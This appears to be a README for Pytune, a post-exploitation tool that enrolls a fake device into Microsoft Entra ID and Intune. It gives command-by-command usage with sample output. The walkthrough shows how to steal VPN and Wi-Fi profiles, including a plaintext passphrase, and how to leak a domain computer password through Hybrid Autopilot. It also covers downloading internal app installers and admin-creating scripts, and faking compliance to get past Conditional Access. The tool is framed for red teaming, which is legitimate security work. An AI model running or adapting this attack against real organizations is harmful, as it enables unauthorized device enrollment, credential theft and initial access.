Pytune is a post-exploitation tool for enrolling a fake device into Intune with mulitple platform support.
Note that this is a proof of concept tool. The tool is provided as is, without warranty of any kind.
Supported OSs are as follows:
- Windows
- Android
- Linux
This tools gives red teamers following advantages;
- Enroll a fake device to Entra ID and Intune
- Steal device configurations such as VPN, and Wi-Fi
- Leak domain computer credentials if hybrid autopilot is enabled
- Download installer files for lin-of-business apps, powershell scritps and custom Win32 apps (.bat, .exe ...etc)
- Bypass Entra ID Conditional Access policy of "Marked as Compliant"
- Clean up
python3 -h
usage: [-h] {entra_join,entra_delete,enroll_intune,checkin,retire_intune,check_compliant,download_apps} ...
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Faking a device to Microsft Intune (version:1.0)
-h, --help show this help message and exit
pytune commands
entra_join join device to Entra ID
entra_delete delete device from Entra ID
enroll_intune enroll device to Intune
checkin checkin to Intune
retire_intune retire device from Intune
check_compliant check compliant status
download_apps download available win32apps and scripts (only Windows supported since I'm lazy)
To enroll a fake device to Intune, you need to register it to Entra ID first with entra_join
$ python3 entra_join -o Windows -d Windows_pytune -u testuser@******* -p ***********
Saving private key to Windows_pytune_key.pem
Registering device
Device ID: 8fd0710a-1ea3-4261-86d1-48d7509c80b8
Saved device certificate to Windows_pytune_cert.pem
[+] successfully registered Windows_pytune to Entra ID!
[*] here is your device certificate: Windows_pytune.pfx (pw: password)
You will receive an Entra ID's device certificate when succeded.
Then, you can enroll the fake device to Intune with enroll_intune
$ python3 enroll_intune -o Windows -d Windows_pytune -c Windows_pytune.pfx -u testuser@******* -p ***********
[*] resolved enrollment url:
[+] successfully enrolled Windows_pytune to Intune!
[*] here is your MDM pfx: Windows_pytune_mdm.pfx (pw: password)
Intune MDM device ceritificate, {device_name}_mdm.pfx
, is generated once the device is enrolled to Intune.
You can start check-in with checkin
This exchanges information between device and Intune management server.
$ python3 checkin -o Windows -d Windows_pytune -c Windows_pytune.pfx -m Windows_pytune_mdm.pfx -u testuser@******* -p ***********
[*] send request #1
[*] sending data for ./Vendor/MSFT/NodeCache/MS%20DM%20Server
[*] sending data for ./Vendor/MSFT/NodeCache/MS%20DM%20Server/CacheVersion
[*] sending data for ./Vendor/MSFT/NodeCache/MS%20DM%20Server/ChangedNodes
[*] sending data for ./DevDetail/SwV
[*] sending data for ./DevDetail/Ext/Microsoft/LocalTime
[*] sending data for ./Vendor/MSFT/WindowsLicensing/Edition
[*] sending data for ./Vendor/MSFT/Update/LastSuccessfulScanTime
If there are any device configuration profiles, pytune will steal and display them. The followings are the examples of VPN and Wi-Fi settings delivered to the fake device.
[*] send request #9
[*] checkin ended!
[!] maybe these are configuration profiles:
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/RememberCredentials: false
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/AlwaysOn: false
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/RegisterDns: false
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/DeviceCompliance/Enabled: false
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/DeviceCompliance/Sso/Enabled: false
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/PluginProfile/ServerUrlList:;Internal VPN
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/PluginProfile/CustomConfiguration: <pulse-schema><isSingleSignOnCredential>true</isSingleSignOnCredential></pulse-schema>
- ./Device/Vendor/MSFT/VPNv2/Contoso%20VPN/PluginProfile/PluginPackageFamilyName: 951D7986.PulseSecureVPN_qzpvqh70t9a4p
- ./Vendor/MSFT/DMClient/Provider/MS%20DM%20Server/Poll/PollOnLogin: true
- ./cimv2/MDM_ConfigSetting/MDM_ConfigSetting.SettingName=%22AccountId%22/SettingValue: 3decc354-7c51-4c78-9f40-7eb57efbe447
- ./Vendor/MSFT/WiFi/Profile/ContosoCorp_Wi-Fi/WlanXml:
{'WLANProfile': {'@xmlns': '', 'name': 'ContosoCorp_Wi-Fi', 'SSIDConfig': {'SSID': {'hex': '436F6E746F736F436F72705F57692D4669', 'name': 'ContosoCorp_Wi-Fi'}, 'nonBroadcast': 'false'}, 'connectionType': 'ESS', 'connectionMode': 'auto', 'autoSwitch': 'false', 'MSM': {'security': {'authEncryption': {'authentication': 'WPA2PSK', 'encryption': 'AES', 'useOneX': 'false', 'FIPSMode': {'@xmlns': '', '#text': 'false'}}, 'sharedKey': {'keyType': 'passPhrase', 'protected': 'false', 'keyMaterial': 'SuperSecretWiFiPassword'}, 'PMKCacheMode': 'disabled'}}}}
- ./Vendor/MSFT/WiFi/Profile/ContosoCorp_Wi-Fi/WiFiCost: 1
- ./Vendor/MSFT/DMClient/Provider/MS%20DM%20Server/Push/PFN: 15494WindowsStoreWNS.WNSIntune_skcpvdt8tnyse
Also, if any installer files for line-of-business apps are configured to be delivered, checkin
command will download it as follows.
[!] we found line-of-business app...
[*] downloading msi file from
[+] successfully downloaded to 45d9c902-8d79-417a-8414-4b21948011dd.msi
This could be a VPN client installer file that can be used for initial access.
The device's compliance state is evaluated through the information sent to Intune during the check-in.
command queies the compliance state of the fake device and tell you which settings are not compliant with the company's policy
$ python3 check_compliant -o Windows -c Windows_pytune.pfx -u testuser@******* -p ***********
[*] resolved IWservice url:
[*] resolved token renewal url:
[-] Windows_pytune is not compliant
[!] non-compliant reason #1:
- SettingID: Firewall_Enabled
- Title: Device must have firewall enabled.
- Description: This device must have the firewall enabled. Contact your IT administrator for help.
[!] non-compliant reason #2:
- SettingID: SpecificationVersionForCompliance
- Title: A Trusted Platform Module (TPM) is required
- ExpectedValue: Equals True
- Description: This device does not have an active TPM present.
You can modify what settings are sent as a fake device, for example, in device/
Then, re-enroll and check-in again so that you can get a fake device being marked as compliant.
When Hybrid Autopilot is configured, you can leak a domain computer's credential for initial access. To enroll a fake device as AutoPilot, you need to get a hardware hash from your test machine.
As for the hardware hash retrieval, you can referer to the following page.
Then, you can provide the hardware hash in -H
parameter in checkin
$ python3 checkin -o Windows -d Windows_pytune -c Windows_pytune.pfx -m Windows_pytune_mdm.pfx -u testuser@******* -p *********** -H $HWHASH
Then, after the initial check-in with the hardware hash, the next check-in will give you the domain credential.
[+] got online domain join blob
[*] parse domain join info...
- domain: vuln.local
- computername: DESKTOP-PZjn0P9$
- computerpass: _`@#"%zsw^W***********************************************
If there are Win32 apps or PowerShell scripts to be delviered, you can donwload it through download_apps
Here is the example of the command.
$ python3 download_apps -d Windows_pytune -m Windows_pytune_mdm.pfx
[*] downloading scripts...
[!] scripts found!
[*] #1 (policyid:f7e2c3b6-b57f-43fb-a17f-2feab218806b):
$userName = "pcadmin"
$password = "SuperSecurePassword"
$securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force
New-LocalUser -Name $userName -Password $securePassword -FullName "Local Administrator" -Description "Local Admin User" -PasswordNeverExpires
Add-LocalGroupMember -Group "Administrators" -Member $userName
[*] downloading win32apps...
[!] found ContosoCorpCustomApp!
[*] downloading from ...
[+] successfully downloaded to ContosoCorpCustomApp.intunewin!
[!] found DomainJoin.bat!
[*] downloading from ...
[+] successfully downloaded to DomainJoin.bat.intunewin!
When successful, PowerShell scripts are displayed and also .intunewin files are downloaded.
.intunewin file is just a zip file and you can unzip it to extract the Win32 apps inside.
For clean-up, retire the fake device from Intune.
First, you need to execute retire_intune
$ python3 retire_intune -o Windows -c Windows_pytune.pfx -u testuser@******* -p ***********
[*] resolved IWservice url:
[*] resolved token renewal url:
[*] resolved reitrement url:'cabd6f8f-a88f-42e7-b3d0-6b93efb41657')/FullWipe
[+] successfully retired: 8fd0710a-1ea3-4261-86d1-48d7509c80b8
To complete retirement, you need to check-in again. This will delete the fake device object from Intune.
$ python3 checkin -o Windows -d Windows_pytune -c Windows_pytune.pfx -m Windows_pytune_mdm.pfx -u testuser@******* -p ***********
[*] send request #1
[*] send request #2
[*] sending data for ./Vendor/MSFT/DMClient/Provider/MS%20DM%20Server/EntDMID
[*] send request #3
[*] checkin ended!
Additionally, you need to delete the device in Entra ID as well with entra_delete
$ python3 entra_delete -c Windows_pytune.pfx
Device was deleted in Azure AD
If the device is enrolled as an AutoPilot device, then it fails to delete the device object from Entra ID.
Delete the device information in Microsoft Intune admin center > Windows > Enrollment > Devices before entra_delete